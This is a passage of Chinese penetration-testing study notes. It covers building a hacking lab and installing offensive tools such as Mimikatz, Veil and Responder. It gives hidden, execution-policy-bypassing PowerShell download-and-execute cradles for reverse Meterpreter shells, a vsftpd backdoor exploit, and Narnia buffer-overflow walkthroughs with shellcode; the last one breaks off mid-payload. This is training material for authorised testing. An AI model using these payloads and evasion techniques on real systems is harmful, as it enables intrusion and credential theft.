渗透学习

1.1搭建测试环境

Linux和 Windows兼备

 

1.2建立一个域

 

1.3建立其他服务器

Metasploitable2(一个优秀的 Ubuntu Linux虚拟机)

下载地址:http://sourceforge.net/projects/metasploitable/files/Metasploitable2

 

OWASPBWA(漏洞网站多)

http://sourceforge .net/projects/owaspbwa/files/

 

1.4安装测试环境

1.4.1安装虚拟平台

  VirtualBox(http://www.virtualbox.org)

   VMWarePlayer(https://my.vmware.com/web/vmware/downloads)

在配置主机后,对干净状态和配置状态的虚拟机进行了快照。后面的测试中需要做到就是恢复虚拟机到基础镜像,对工具进行升级和打补丁或者添加其他需要的工具。

 

1.5硬件

测试笔记本

1、8G以上笔记本两个

2、500G硬盘(最好固态)

3、Intel酷睿i7四核处理器

密码破解桌面

机箱:海盗船复仇C70。

 

显卡:SAPPHIRE 100360SR Radeon R9 295x2 8GBGDDR5。

 

硬盘:三星840 EVO MZ-7TE500BW 2.5" 500GBSATA III TLC Internal固态盘。

 

电源:银欣ST1500 1500W ATX。

 

内存:海盗船复仇16GB(2×8GB)240针脚DDR3 SDRAM DDR3 1600。

 

CPU:酷睿i7 4790K 4.0G。

 

主板:华硕MAXIMUS VII FORMULA。

 

处理器风扇:酷冷至尊Hyper 212 EV。

 

 

 

1.6开发软件

商业软件

Burp Suite Pro

  •  Web渗透测试工具集
  • 下载网址:http://portswigger.net/burp/proxy.html。强烈推荐购买专业版本,售价299美元,绝对物有所值。

 

Canvas

Cobalt Strike

Core Impact

Nessus

Nexpose

2.Kali Linux(https://www.kali.org/)

1.5.5 搭建Kali Linux

查看http://www.thehackerplaybook.com网页的更新。

所有的配置和软件部分放到了Github网址(http://www.github.com/cheetz/thp2)。通过复制和粘贴脚本,方便渗透测试工作,不需要手动输入每一个命令。

可以通过地址http://www.kali.org/downloads/下载Kali Linux发行版。强烈推荐下载VMware镜像(https://www.offensive-security.com/kali-linux-vmware-arm-image-download)和VirtualPlayer/VirtualBox。记住镜像文件采用gz压缩和tar存档格式,首先提取压缩和存档文件,然后加载vmx文件。

1.Kali虚拟机启动和运行

  • 使用用户名root和默认密码toor登录
  • 打开一个终端
  • 修改密码
    • passwd
  • 更新镜像
    • apt-get update
    • apt-get dist-upgrade
  • 设置Metasploit数据库
    • service postgresql start
  • 让postgresql数据库在启动时加载
    • update-rc.dpostgresql enable
  • 启动和停止Metasploit服务(设置数据库.yml文件)
    • service metasploit start
    • service metasploit stop
  • 安装gedit软件
    • apt-get install gedit
  • 修改主机名(很多网络管理员在DHCP的日志中查询到多台命名为Kali的主机,最好遵循渗透测试公司的主机命名规则)
    • gedit /etc/hostname
      更改主机名(替换kali)并保存
    • gedit /etc/hosts
      更改主机名(替换kali)并保存
    • reboot
  • *Metasploit可选项——启动日志记录
    • 作为可选项,如果启用日志就会变得很大,但是通过Metasploit命令行接口,可以记录运行的每一条命令和结果。如果客户需要日志记录或者开展批量攻击和查询,这将变得非常有用。*如果是干净的镜像,首先输入msfconsole,在配置logging命令创建.msf4文件夹之前退出。
    • 在命令行中输入:
      echo"spool /root/msf_console.log" > /root/.msf4/msfconsole.rc
    • 日志存储在/root/msf_console.log。

 

3.Back Box(http://www.backbox.org/

 

1.7 建立平台

探测扫描工具

 

安装Firefox插件

  • Web开发人员插件:https://addons.mozilla.org/en-US/firefox/addon/webdeveloper/
  • Tamper Data:https://addons.mozilla.org/en-US/firefox/addon/tamper-data/
  • Foxy Proxy:https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard/
  • User Agent Switcher:https://addons.mozilla.org/en-US/firefox/addon/user-agentswitcher/

 

Discover

Discover Scripts

  • 定制的bash脚本,自动化处理各种渗透任务
  • git clone https://github.com/leebaird/discover.git/opt/discover
  • cd /opt/discover && ./setup.sh

 

EyeWitness

  • EyeWitness工具实现网站截图,搜集服务器报头信息和判断网站是否采用默认口令
  • git clone https://github.com/ChrisTruncer/EyeWitness.git/opt/EyeWitness

 

HTTPScreenShot

  • HTTPScreenShot工具实现屏幕截图和大量网站网页的抓取
  • pip install selenium
  • git clone https://github.com/breenmachine/httpscreenshot.git/opt/ httpscreenshot
  • cd /opt/httpscreenshot
  • chmod +x install-dependencies.sh && ./install-dependencies.sh
  • HTTPScreenShot仅仅默认工作在64位Kali操作系统,如果运行32位PAE操作系统,按照下面步骤安装phatomjs:
    • wget https://bitbucket.org/ariya/phantomjs/downloads/ phantomjs-1.9.8-linuxi686.tar.bz2
    • bzip2 -d phantomjs-1.9.8-linux-i686.tar.bz2
    • tar xvf phantomjs-1.9.8-linux-i686.tar
    • cp phantomjs-1.9.8-linux-i686/bin/phantomjs /usr/bin/

 

WMAP

 

SpiderFoot

  • 开源的指纹检测工具
  • mkdir /opt/spiderfoot/ && cd /opt/spiderfoot
  • wget http://sourceforge.net/projects/spiderfoot/files/spiderfoot-2.3.0-src.tar.gz/download
  • tar xzvf download
  • pip install lxml
  • pip install netaddr
  • pip install M2Crypto
  • pip install cherrypy
  • pip install mako

 

Masscan

  • 这是最快速的互联网端口扫描工具,能够在6分钟扫描整个互联网
  • apt-get install gitgcc make libpcap-dev
  • git clone https://github.com/robertdavidgraham/masscan.git /opt/masscan
  • cd /opt/masscan
  • make
  • make install

 

Gitrob

  • 一种针对GitHub组织的探测工具
  • git clone https://github.com/michenriksen/gitrob.git /opt/gitrob
  • gem install bundler
  • service postgresql start
  • supostgres
  • createuser -s gitrob --pwprompt
  • createdb -O gitrobgitrob
  • exit
  • cd /opt/gitrob/bin
  • gem install gitrob

 

CMSmap

  • CMSmap是基于Python开发的开源内容管理系统扫描工具,实现对安全漏洞自动扫描
  • git clone https://github.com/Dionach/CMSmap /opt/CMSmap

 

Recon-ng

  • 一个功能齐全的网站探测框架,使用Python编写
  • git clone https://bitbucket.org/LaNMaSteR53/recon-ng.git /opt/recon-ng

 

SPARTA

  • 从NTDSXtract中提取用户易于理解的哈希值
  • wget http://ptscripts.googlecode.com/svn/trunk/dshashes.py -O/opt/NTDSXtract/dshashes.py

 

WPScan

  • WordPress漏洞扫描工具和暴力破解工具
  • git clone https://github.com/wpscanteam/wpscan.git /opt/wpscan
  • cd /opt/wpscan&& ./wpscan.rb --update

 

Password Lists

 

漏洞利用工具

 

 

Fuzzing Lists(SecLists)

  • 用于配置Burp渗透测试参数
  • git clone https://github.com/danielmiessler/SecLists.git/ opt/SecLists

 

Burp Suite Pro

  • Web渗透测试工具集
  • 下载网址:http://portswigger.net/burp/proxy.html。强烈推荐购买专业版本,售价299美元,绝对物有所值。

 

ZAP Proxy Pro

  • OWASP ZAP:一个使用方便的集成渗透测试工具,用于挖掘网站应用程序漏洞
  • 下载网址:https://code.google.com/p/zaproxy/wiki/Downloads?tm=2
  • *Kali Linux默认安装(owasp-zap)

 

NoSQLMap

  • 用于MongoDB数据库和网站应用程序的自动化渗透测试工具集
  • git clone https://github.com/tcstool/NoSQLMap.git /opt/NoSQLMap

 

SQLMap

  • SQL注入工具
  • git clone https://github.com/sqlmapproject/sqlmap /opt/sqlmap

 

SQLNinja

 

BeEF Exploitation Framework

  • 一个跨站脚本攻击框架
  • cd/opt/
  • wget https://raw.github.com/beefproject/beef/a6a7536e/install-beef
  • chmod +x install-beef
  • ./install-beef

 

Responder

  • 一个LLMNR、NBT-NS和MDNS协议攻击工具,包括HTTP/SMB/MSSQL/FTP/LDAP诱骗认证方法,支持NTLMv1/NTLMv2/LMv2,扩展的NTLMSSP和基本HTTP认证协议。Responder用于获取NTLM挑战/应答哈希值。
  • git clone https://github.com/SpiderLabs/Responder.git /opt/Responder

 

Printer Exploits

  • 包括大量常用的打印机漏洞利用工具

·       git clone https://github.com/MooseDojo/praedasploit/opt/praedasploit

Veil

Veil-Framework

  • 红队工具集用于规避杀毒软件检测。目前包括Veil-Evasion用于生成规避杀毒软件净荷,Veil-Catapult投送净荷到目标,Veil-PowerView获取Windows域网络拓扑信息。Veil框架也可用于创建基于Python脚本的Meterpreter可执行程序
  • git clone https://github.com/Veil-Framework/Veil /opt/Veil
  • cd /opt/Veil/ && ./Install.sh -c

 

WIFIPhisher

  • WiFi网络自动化钓鱼攻击
  • git clone https://github.com/sophron/wifiphisher.git/opt/wifiphisher

 

Wifite

  • WiFi网络攻击工具
  • git clone https://github.com/derv82/wifite/opt/wifite

 

SET

  • 社会工程工具集(Social Engineering Toolkit,SET)主要用于社会工程攻击
  • git clone https://github.com/trustedsec/social-engineer-toolkit/ /opt/set/
  • cd /opt/set && ./setup.py install

 

后渗透测试

 

 

本书中的自定义脚本

  • git clone https://github.com/cheetz/Easy-P.git /opt/Easy-P
  • git clone https://github.com/cheetz/Password_Plus_One /opt/Password_Plus_One
  • git clone https://github.com/cheetz/PowerShell_Popup /opt/PowerShell_Popup
  • git clone https://github.com/cheetz/icmpshock /opt/icmpshock
  • git clone https://github.com/cheetz/brutescrape /opt/brutescrape
  • git clone https://www.github.com/cheetz/reddit_xss /opt/reddit_xss

 

SMBexec

  • 使用samba工具的一种快速psexec类型攻击

·       git clone https://github.com/pentestgeek/smbexec.git/opt/smbexec

  • cd /opt/smbexec&& ./install.sh
  • 选择1 - Debian/Ubuntu and derivatives
  • 选择所有默认值Select all defaults
  • ./install.sh
  • 选择4编译smbexec二进制文件
  • 编译完成后选择5退出

 

Veil

 

WCE

  • Windows凭证编辑器(Windows Credential Editor,WCE),用于从内存中读取密码
  • 下载地址为http://www.ampliasecurity.com/research/windows-credentials-editor/,将其存储在/opt/。例如:
    • wget www.ampliasecurity.com/research/wce_v1_4beta_universal.zip
    • mkdir/opt/wce&& unzip wce_v1* -d /opt/wce&&rm wce_v1*.zip

 

Mimikatz

  • 用于从内存获取明文密码、金票据和万能密钥等
  • 从https://github.com/gentilkiwi/mimikatz/releases/latest获取最新版本
    • cd /opt/ &&wget http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip
    • unzip-d ./mimikatz mimikatz_trunk.zip

 

PowerSploit

  • PowerShell脚本用户后渗透测试
  • git clone https://github.com/mattifestation/PowerSploit.git /opt/PowerSploit
  • cd/opt/PowerSploit && wget
  • https://raw.githubusercontent.com/obscuresec/random/master/StartListener.py && wget
  • https://raw.githubusercontent.com/darkoperator/powershell_scripts/master/ps_encoder.py

 

Nishang

  • PowerShell漏洞利用和后渗透测试脚本汇总
  • git clone https://github.com/samratashok/nishang/opt/nishang

 

后门制造工厂

  • 对PE、ELF、Mach-O等二进制文件注入shellcode
  • git clone https://github.com/secretsquirrel/the-backdoor-factory/opt/the-backdoorfactory
  • cd the-backdoor-factory
  • ./install.sh

DSHashes

  • 从NTDSXtract中提取用户易于理解的哈希值
  • wget http://ptscripts.googlecode.com/svn/trunk/dshashes.py -O/opt/NTDSXtract/dshashes.py

 

Net-Creds

Net-Creds网络分析

  • 分析PCAP文件,获取用户名/密码
  • git clone https://github.com/DanMcInerney/net-creds.git/ opt/net-creds

 

代码副本

  • 本书使用了PowerSploit和Powertools的代码副本,记住要从原始的代码库中复制一份
  • git clone https://github.com/cheetz/PowerSploit/opt/HP_PowerSploit
  • git clone https://github.com/cheetz/PowerTools/opt/HP_PowerTools
  • git clone https://github.com/cheetz/nishang/opt/nishang

 

Phishing(可选)

  • Phishing-Frenzy
    • git clone https://github.com/pentestgeek/phishing-frenzy.git/var/www/phishing-frenzy
  • 其他自定义列表
    • git clone https://github.com/macubergeek/gitlist.git /opt/gitlist

 

 

1.8 设置Windows环境

搭建Windows通用测试平台作为KaliLinux平台的备份。记住一定要修改主机名,如果不使用NetBios,就禁用NetBios功能,要做的最后一件事是在评估过程中获取控制权。

设置Windows通常安装以下软件。

  • HxD:下载地址为http://mh-nexus.de/en/hxd/
  • Evade:下载地址为https://www.securepla.net/antivirus-now-you-see-me-now-you-dont
  • Hyperion:下载地址为http://www.nullsecurity.net/tools/binary.html
    • 下载并安装Windows编译器,地址为http://sourceforge.net/projects/mingw/
    • 在Hyperion目录下运行make命令,就可以得到二进制文件。
  • 下载并安装Metasploit,地址为http://www.Metasploit.com/
  • 下载并安装Nessus或者Nexpose
    • 如果打算购买商业软件,可以考虑购买Nessus,因为它更便宜,但是两个软件都能发挥作用。
  • 下载并安装nmap,地址为http://nmap.org/download.html
  • 下载并安装oclHashcat,地址为http://hashcat.net/oclhashcat/
  • 下载并安装Cain and Abel,地址为http://www.oxid.it/cain.html
  • 下载Burp Proxy Pro,地址为http://portswigger.net/burp/download.html
  • 下载并解压Nishang,地址为https://github.com/samratashok/nishang
  • 下载并安装PowerSploit,地址为https://github.com/mattifestation/PowerSploit/
  • 安装Firefox插件
    • Web开发人员插件:https://addons.mozilla.org/en-US/firefox/addon/webdeveloper/
    • Tamper Data:https://addons.mozilla.org/en-US/firefox/ addon/tamper-data/
    • Foxy Proxy:https://addons.mozilla.org/en-US/firefox/ addon/foxyproxystandard/
    • User Agent Switcher:https://addons.mozilla.org/en-US/firefox/addon/useragent-switcher/

1.9 启动PowerShell

PowerShell功能,请观看这个视频:

  • PowerShell脚本安全介绍:http://bit.ly/1MCb7EJ

PowerShell对于渗透测试人员有以下益处:

  • Windows 7以上操作系统默认安装;
  • PowerShell脚本可以运行在内存中;
  • 几乎不会触发杀毒软件;
  • 可以调用.NET类;
  • 利用用户口令(查询活动目录);
  • 可以用来管理活动目录;
  • 远程执行PowerShell脚本;
  • 使得Windows脚本攻击更加容易;
  • 目前很多工具是基于PowerShell开发的,掌握这些工具帮助您成为能力出众、效率较高的渗透测试人员。

您可以通过Windows终端提示符输入“PowerShell”,进入PowerShell命令行,输入“help”命令显示帮助菜单。下面是本书用到的基本参数和基本设置。

  • -Exec Bypass:绕过执行安全保护。
    • 这个参数非常重要!默认情况下,PowerShell的安全策略不允许运行命令和文件。通过设置这个参数,可以绕过任何一个安全保护规则。在本书中,每一次运行PowerShell脚本时均使用这个参数。
  • -NonI:非交互模式,PowerShell不提供用户交互式提示符。
  • -NoProfile(或者 –NoP):PowerShell控制台不加载当前用户的配置。
  • -noexit:执行后不退出shell。这对于脚本,例如键盘记录,非常重要,因此这些脚本可以继续执行。
  • -W Hidden:设置会话的窗口风格,将命令窗口保持隐藏。
  • 32位或64位PowerShell。
    • 这非常重要。一些脚本仅仅能够运行在它们指定的平台。因此,如果是在64位平台,需要执行64位PowerShell脚本来运行命令。
    • 32位PowerShell脚本执行:
      powershell.exe -NoP -NonI -W Hidden -Exec Bypass
    • 64位PowerShell脚本执行:
      %WinDir%\syswow64\windowspowershell\v1.0\powershell.exe -NoP -NonI -W Hidden -Exec Bypass

为了更好了解PowerShell的使用方法,下面介绍一些常用的执行命令(这些命令将在本书中使用)。

第一个命令是从网站服务器下载PowerShell脚本,并执行脚本。在很多情况下,通过命令行,在被攻击对象主机上下载MeterpreterPowerShell脚本:

  • Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX (New-ObjectNet.WebClient). DownloadString('[PowerShell URL]'); [Parameters]

例如,如果想在目标上执行Meterpreter Shell,需要下载这个脚本:

  • https://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1

我们同样需要知道使用什么参数。最简单的找到参数的方式是阅读PowerShell脚本源代码,获取和浏览Invoke--Shellcode.ps1文件。查看Mattifestationbianxie开发的Invoke--Shellcode.ps1文件,可以通过这个例子,了解如何调用反向https Meterpreter shell(见图1.1)。

最终的PowerShell命令看起来如下所示。

图1.1 Invoke--Shellcode.ps1

可以看出,PowerShell使用非常简单,而且功能超级强大。下面了解更多的例子。

例如,下载同一个文件到目标上。您不需要访问网页,就可以自动下载和执行文件。在本地执行文件:

  • powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "& { Import-Module [Path and File of PowerShell]; [Parameters] }"

最后,在本书中我通常使用base64编码PowerShell脚本,目的是混淆和压缩代码。运行和编码PowerShell脚本的命令如下:

  • powershell.exe -NoP -NonI -W Hidden -Exec Bypass -enc [Base64 Code]

希望上述的例子能帮助您在渗透测试中娴熟地使用PowerShell。

1.10 Easy-P

因为本书大量应用PowerShell脚本实施攻击,所以我创建了一个小的脚本,用于在渗透测试过程中获取PowerShell脚本。Easy-P包括我常用的一些PowerShell工具,并且具有编码脚本的功能。

对于每个命令,Easy-P提供多种方式运行代码,包括本地和远端。注意所有的远程PowerShell脚本指向我的代码或者其他人代码的复制版本。在这里我要强调一点,在后面的章节中还会提到多次:记住要从源代码中复制自己的一个拷贝,这样您就不会盲目地运行其他人的代码。现在如果一些人恶意地随意篡改PowerShell脚本,您永远不会知道发生了什么。没有做什么或者更坏的情况是,您的shell将转向其他人指定的地址。下面了解一下Easy-P的功能(见图1.2),使渗透测试工作变得更加简单。

  • cd /opt/Easy-P
  • python ./easy-p.py

图1.2 THP Easy-P

我在本书中最经常做的一件事就是使用PowerShell Meterpreter脚本。当执行Easy-P脚本时,输入选项4。设置本地主机IP和Meterpreter脚本回连的端口。完成设置后,就能看到如图1.3所示的输出。

得到4个不同类型的输出。

  • 从因特网下载和执行:从网站下载一个PowerShell脚本,然后执行脚本。虽然仅获得简单的shell,并且不能下载文件,但是也很棒了。
  • 从脚本的一个本地副本运行:如果您已经将一个PowerShell文件下载到系统中,运行命令导入PowerShell脚本,然后执行脚本。
  • Base64编码版本下载和执行:如果由于某个原因想混淆编码脚本,或者遇到字符限制,您可以使用base64编码代码,然后执行命令。
  • 资源文件:最后输出的是关联的资源文件。Metasploit资源文件是一种快捷方式,自动为MeterpreterPowerShell建立监听程序。复制资源脚本并将它存成文件:/opt/listener.rc。

图1.3 Easy-P输出示例

所有的脚本已经配置成绕过执行策略,保持隐藏,以及非交互运行。看一下Easy-P其他菜单选项,还包括权限提升、横向渗透、键盘记录、PowerShellMeterpreter和修改用户执行策略等功能。请随意复制我的代码,然后修改、增加所需要的PowerShell代码。

 

1.11特别知识点

1.11.1 Metasploitable 2

在开始前,需要下载安装Metasploitable 2环境的VMWare镜像。

下载地址为http://sourceforge.net/projects/metasploitable/files/Metasploitable2/

下载Metasploitable 2软件后,解压软件,并在VMware Player或者Virtual Box虚拟机中打开软件,输入用户名msfadmin和密码msfadmin登录软件。现在运行VM镜像文件。

试验环境

开始运行Nmap、Masscan或者其他漏洞工具,测试存在漏洞的虚拟机。一旦发现系统漏洞,就运行漏洞利用程序获取一个shell。举个例子,我们发现并且将利用vsftpd存在的缺陷。因此,可以搜索漏洞(搜索vsftpd,见图1.4)或者直接运行漏洞利用程序。

  • msfconsole
  • use exploit/unix/ftp/vsftpd_234_backdoor(选择漏洞)
  • show options(显示配置选项)
  • set RHOST [IP](设置Metasploitable 2 IP)
  • exploit(运行漏洞)

图1.4 Metasploit例子

成功利用这个漏洞,读取存储的密码:cat /etc/shadow。为了深入研究Metasploitable 2,请阅读Rapid7指南,地址为https://community.rapid7.com/docs/DOC-1875。

这个虚拟机包括很多不同类型漏洞。您要花费时间学习如何有效使用Metasploit和Meterpreter。如果想深入了解Metasploit,推荐访问http://www.amazon.com/Metasploit-The-Penetration-Testers-Guide/dp/159327288X。

1.11.2二进制利用

请阅读下面的书籍:The Shellcoders Handbook(http://amzn.to/1E3k89R)或者Hacking: The Art of Exploitation,2nd Edition(http://amzn.to/1z8oThD)。然而,这并不意味着您不需要理解缓冲区溢出和基本漏洞技术。既然所有的渗透测试人员都需要能够编写脚本代码,那么他们也需要能理解漏洞利用代码。比如可能在Metasploit找到一个模块,它不能正常工作,需要较小的调整,或者需要验证从互联网下载的漏洞利用代码。

已经有大量不同类型网站,帮助开始学习二进制漏洞基础知识。一个非常好的学习网站是Over the Wire(http://overthewire.org/wargames/narnia/ )。Over the Wire网站是一个在线夺旗挑战站点,专注于从二进制攻击到网站攻击所有方面的知识。在本章,仅仅介绍二进制漏洞利用。如果您之前没有了解相关的背景知识,我建议用几个周末的时间深入研究这个网站。为了顺利进入情况,我先和您一起回答几个试题,然而后面的挑战试题需要您自己完成。

在开始前,需要学习以下基础知识:

  • 基本的汇编语言和理解寄存器的使用;
  • GDB基础知识(GNU调试器);
  • 理解不同类型的内存段(栈、堆、数据、BSS和代码段);
  • Shellcode基本概念。

下面这些资源可能会对学习有所帮助:

  • http://opensecuritytraining.info/IntroX86.html
  • http://www.reddit.com/r/hacking/comments/1wy610/exploit_tutorial_buffer_overflow/
  • https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stackbased-overflows/
  • http://www.lethalsecurity.com/wiki
  • http://opensecuritytraining.info/Exploits1.html
  • https://exploit-exercises.com/protostar/

 

1.11.3Narnia设置(http://overthewire.org/wargames/narnia/)

(1)阶段1

Narnia正确配置后,SSH登录到它们的服务器,所有的挑战位于/narnia/目录下。下面详细了解前三个例子。在Kali的终端提示符下或者在Windows下使用类似于Putty(http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html)的软件。

  • ssh narnia0@narnia.labs.overthewire.org
  • Password: narnia0
  • cd /narnia/

每一阶段挑战都提供C语言代码和二进制可执行文件。对于挑战0,具有访问narnia0和narnia0.c的权限。现在看一下C代码。

  • cat narnia0.c

快速浏览代码(见图1.5)后,看到变量“val”被赋值十六进制“AAAA”。其次,可以看到,程序接受输入的缓冲区长度为20字节。在之后的一些行,scanf()函数允许最多输入24字节。这是非常简单的缓冲区溢出例子。现在运行可执行文件,作为测试,输入20个A和4个B(因为我们知道十六进制值A=41和B=42),在命令提示符下,显示的字符如下:

  • narnia0@melinda:/narnia$ ./narnia0
  • 修改val的值0x41414141 -> 0xdeadbeef!
  • 这个是您的机会:AAAAAAAAAAAAAAAAAAAABBBB
  • 缓冲区:AAAAAAAAAAAAAAAAAAAABBBB
  • val:0x42424242
  • 退出!!!!

图1.5 narnia0代码

太棒了!因为val十六进制值是0x42424242(42对应ASCII字母B),可以修改内存中val的值,之前这个值是0x41414141。现在需要做的就是修改内存值为0xdeadbeef。这里提醒一下,所有写到堆栈中的值必须是小端格式(http://en.wikipedia.org/wiki/Endianness ),这意味着0xdeadbeef最后的字节必须是第一个压到栈中的字节,从而覆盖val的值。目标机器栈机制是先进后出(FILO),或者说是后进先出(LIFO)的架构。因此,为了设置0xdeadbeef值,以“\xef\xbe\xad\xde”顺序写入。最简单的方式是使用Python语言生成所需的数值,并将其作为narnia0例子的输入值。请看下面的操作过程:

  • narnia0@melinda:/narnia$ python -c 'print "A"*20 + "\xef\xbe\xad\xde"' | ./narnia0
  • 修正val变量值从0x41414141 -> 0xdeadbeef!
  • 这是机会:buf: AAAAAAAAAAAAAAAAAAAA?
  • val: 0xdeadbeef

太棒了!现在已经将deadbeef值写入“val”变量中。那么如何运行shell命令呢?再查看C代码,可以看到,如果匹配deadbeef,/bin/sh将被调用。因此运行Python代码,并读取位于/etc/narnia_pass/narnia1的密钥:

  • narnia0@melinda:/narnia$ (python -c 'print "A"*20 + "\xef\xbe\xad\xde"'; echo 'cat /etc/narnia_pass/narnia1') | /narnia/narnia0
  • 修正val变量值从0x41414141到0xdeadbeef!
  • 这是机会:缓冲区:AAAAAAAAAAAAAAAAAAAA?
  • val: 0xdeadbeef
  • [阶段1的答案]

如果成功了,就通过阶段1,并获得narnia1账户的口令(见图1.6)。现在需要注销账户并使用narnia1账户重新登录。

图1.6 narnia0漏洞利用

(2)阶段2

在完成每一个阶段后,都可以获得下一个账户的口令。使用刚刚获得narnia1账户登录阶段2:

  • ssh narnia1@narnia.labs.overthewire.org
  • Password: [narnia1的密码]
  • cd /narnia/
  • cat narnia1.c

浏览这段C代码(见图1.7),很快可以看到一些操作。

  • int (*ret)():是一个指向ret的指针,用于获取指针对应的数值。
  • getenv:引入一个环境变量EGG并将值存入变量ret中。
  • 调用ret()。

图1.7 narnia1代码

如果将shellcode存储在环境变量ECG中,那么无论shellcode是什么内容,它都将被执行。简单的做法是设置shellcode代码为/bin/sh,并将其赋值给ECG的环境  变量。

  • 在这个例子中,将恶意代码设置为/bin/sh:http://shell-storm.org/shellcode/files/shellcode-811.php
  • export EGG=‘python -c 'print"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\ x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"'`
  • ./narnia1
  • cat /etc/narnia_pass/narnia2

已经有了narnia2账户的密码(见图1.8),现在可以进入阶段3。

(3)阶段3

登录阶段3:

  • ssh narnia2@narnia.labs.overthewire.org
  • Password: [narnia2的密码]
  • cd /narnia/
  • cat narnia2.c

图1.8 narnia1漏洞利用

浏览C代码,查看下面的代码:

  • char buf[128];
  • if(argc == 1){
  •     printf("Usage: %s argument\n",argv[0]);
  •     exit(1);
  • }
  • strcpy(buf,argv[1]);
  • printf("%s",buf);

通过浏览代码可以看到,通过命令输入一个参数,并将它复制到缓冲区。字符串的缓冲区大小是128个字节,因此我们发送200个字符:

  • narnia2@melinda:/narnia$ ./narnia2 'python -c 'print "A" * 200''
  • 段错误

仅仅是验证,通过发送200个字符,造成程序出现段错误。需要判断发送多少字节,可以覆盖EIP寄存器。可以使用Metasploit的pattern_create.rb模块实现这个目的。这个模块生成一个特别字符串,在下面的例子中,创建200个字节的字符串。由于生成的字符串不会重复,因此能够精确识别出程序在什么位置覆盖EIP。

  • /usr/share/metasploit-framework/tools/pattern_create.rb 200
  • Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5A
    b6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A
    d3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9A
    f0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag

现在运行程序narnia2,输入新生成的特殊字符串,观察在造成段错误之前,输入了多少个字节。为了获得段错误的精确结果,使用了调试器。默认情况下,Linux操作系统内嵌gdb调试器。尽管gdb调试器不是最容易使用的调试器,但是它的功能非常强大。

  • gdb ./narnia2 -q
  • run 'python -c' 'print"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5A
    b6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3A
    d4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1A
    f2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag"''

查询结果如图1.9所示。

图1.9 narnia2漏洞利用

  • 程序接收SIGSEGV信号,段错误。
  • 0x37654136 in ?? ()

命令输出结果是0x37654136。通过查看初始的字符串来查找精确的值。为了能够计算出造成段错误的准确字节数,使用Metasploit的pattern_offset.rb脚本:

  • /usr/share/metasploit-framework/tools/pattern_offset.rb 0x37654136
  • [*] Exact match at offset 140

这表明在140个字节后可以控制EIP。为了证明这个结果,运行narnia2程序,输入140个字节,使用另外的4个字节覆盖EIP。通过使用调试器来观察内存中的变化。

输出结果如下所示。

  • cd /narnia
  • gdb ./narnia2 -q
  • (gdb) run 'python -c 'print "A" * 140 + "B" * 4'`
    • Starting program: /games/narnia/narnia2 'python -c 'print "A" * 140 + "B" * 4'`
    • Program received signal SIGSEGV,Segmentation fault.
    • 0x42424242 in ?? ()
  • (gdb) info registers
    • eax     0x0 0
    • ecx     0x0 0
    • edx     0xf7fcb898   -134432616
    • ebx     0xf7fca000   -134438912
    • esp     0xffffd640    0xffffd640
    • ebp     0x41414141   0x41414141
    • esi     0x0 0
    • edi     0x0 0
    • eip     0x42424242   0x42424242

使用“B”字符(或者十六进制0x42)覆盖EIP,EIP是处理器下一步执行代码的指针。如果将EIP指向一段shellcode区域,就可以控制系统。那么到哪儿可以找到shellcode呢?可以定制shellcode或者从下面网址下载shellcode:http://shell-storm.org/shellcode/。在这个例子中,使用Linux/x86 - execve(/bin/sh),长度28个字节。shellcode长度是28个字节,净荷需要144个字节长度。将A替换为NOP或者0x90,这意味着程序跳到NOP时将继续执行,直到开始运行可执行代码。在使用空指令测试后,我创建了下列代码:

  • cd /narnia
  • gdb ./narnia2 -q
  • run 'python -c 'print "\x90" * 50+
    "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\
    x53\x89\xe1\xb0\x0b\xcd\x80" + "\x90" * 67 + "BBBB"'
    • 开始运行程序:/games/narnia/narnia2 `python -c 'print "\x90" *50+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\ x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80" + "\ x90" * 67 + "BBBB"'
    • 程序接收SIGSEGV信号,段错误。
    • 0x42424242 in ?? ()
  • (gdb) info registers eip
    • eip 0x42424242 0x42424242

通过shellcode和NOP成功控制EIP的值。现在在NOP前放置shellcode,从而获得一个/bin/sh shell。为了能够看到出现段错误后内存中的内容,输入:

  • x/250x $esp

滚动浏览,可以看到以下内容(见图1.10)。

图1.10 NOP Sled

可以看到初始的NOP (x90),后面是shellcode,然后是多个NOP,最后是BBBB。修改BBBB值,使其指向NOP,从而执行shellcode代码。一个简单的地址是0xffffd850栈地址,指向NOP中的第一个字符。开始进行测试,记住不要忘记系统是小段模式。

  • (gdb) run 'python -c 'print "\x90" * 50 +"\x31\xc0\x50\x68\x2f\x2f
    \x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b
    \xcd\x80" + "\x90" * 67 + "\x50\xd8\xff\xff"''
    • 开始运行程序:/games/narnia/narnia2 "python -c 'print "\x90" * 50
      +"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\
